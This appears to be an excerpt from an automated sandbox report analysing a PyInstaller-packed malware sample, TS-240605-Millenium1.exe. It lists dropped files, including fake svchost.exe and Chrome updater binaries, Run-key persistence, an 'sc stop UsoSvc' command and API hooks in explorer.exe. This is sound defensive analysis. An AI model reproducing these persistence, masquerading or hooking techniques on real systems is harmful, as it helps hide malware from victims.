                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pydJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\gqxqtdeqxchk.sysJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\nacl\_sodium.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\python3.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\wrapt\_wrappers.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\select.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\libffi-7.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\python310.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\libcrypto-3.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_sqlite3.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\select.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\gqxqtdeqxchk.sysJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\wxyubnjmnlae.tmpJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\ProgramData\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ??????????
                                  Source: C:\ProgramData\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ??????????
                                  Source: C:\ProgramData\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ??????????
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\ProgramData\setup.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB27100 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6CEB27100
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
